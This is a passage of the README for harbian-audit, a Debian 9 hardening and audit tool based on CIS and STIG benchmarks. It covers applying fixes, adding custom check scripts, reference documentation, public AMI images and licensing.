$ sed -i 's/^define int_if = ens33/define int_if = eth0/g' etc.nftables.conf 
$ sudo nft -f ./etc.nftables.conf
  1. When all repairs are completed. --final method will:
    1. Use passwd command to change the password of the regular and root user to apply the password complexity and robustness of the pam_cracklib module configuration.
    2. Aide reinitializes.
$ sudo bin/hardening.sh --final

Special Note
Some check items check a variety of situations and are interdependent, they must be applied (fix) multiple times, and the OS must be a reboot after each applies (fix).

Items that must be applied after the first application(reboot after is better)
8.1.32 Because this item is set, the audit rules will not be added.

Items that must be applied after all application is ok
8.4.1
8.4.2
These are all related to the aide. It is best to fix all the items after they have been fixed to fix the integrity of the database in the system.

Items that need to be fix twice
8.1.1.2
8.1.1.3
8.1.12
4.5

Hacking
Getting the source
$ git clone https://github.com/hardenedlinux/harbian-audit.git
Adding a custom hardening script
$ cp src/skel bin/hardening/99.99_custom_script.sh
$ chmod +x bin/hardening/99.99_custom_script.sh
$ cp src/skel.cfg etc/conf.d/99.99_custom_script.cfg
Code your check explaining what it does then if you want to test
$ sed -i "s/status=.+/status=enabled/" etc/conf.d/99.99_custom_script.cfg
$ bash bin/hardening.sh --audit --only 99.99
$ bash bin/hardening.sh --apply --only 99.99

Document

Harbian-audit benchmark for Debian GNU/Linux 9
This document is a description of the additions to the sections not included in the CIS reference documentation. Includes STIG reference documentation and additional checks recommended by the HardenedLinux community.
CIS Debian GNU/Linux 8 Benchmark v1.0.0
CIS Debian GNU/Linux 9 Benchmark v1.0.0
harbian audit Debian Linux 9 Benchmark

Manual Operation docs
How to config grub2 password protection
How to persistent iptables rules with debian 9
How to deploy audisp-remote for auditd log
How to migrating from iptables to nftables in debian10
How to persistent nft rules with debian 10

Use case docs
Nodejs + redis + mysql demo
deploy-hyperledger-cello-on-debian-9
nginx-mutual-ssl-proxy-http
nginx-mutual-ssl-proxy-tcp-udp

harbian-audit complianced image

AMI(Amazon Machine Image) Public
The HardenedLinux community has created public AMI images for three different regions.
Destination region: US East(Ohio)
AMI ID: ami-091d37e9d358aaa84
AMI Name: harbian-audit complianced for Debian GNU/Linux 9
Destination region: EU(Frankfurt)
AMI ID: ami-073725a8c2cf45418
AMI Name: harbian-audit complianced for Debian GNU/Linux 9
Destination region: Asia Pacific(Tokyo)
AMI ID: ami-06c0adb6ee5e7d417
AMI Name: harbian-audit complianced for Debian GNU/Linux 9

Docs
how to creating and making an AMI public
how to use harbian-audit complianced for GNU/Linux Debian 9

QEMU Image

Docs
How to creating and making a QEMU image of harbian-audit complianced Debian GNU/Linux 9
How to use QEMU image of harbian-audit complicanced Debian GNU/Linux 9

harbian-audit License
GPL 3.0

OVH Disclaimer
This project is a set of tools. They are meant to help the system administrator built a secure environment. While we use it at OVH to harden our PCI-DSS compliant infrastructure, we can not guarantee that it will work for you. It will not magically secure any random host.
Additionally, quoting the License:
THIS SOFTWARE IS PROVIDED BY OVH SAS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL OVH SAS AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

OVH License
3-Clause BSD

Reference


Viewing all 5816 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>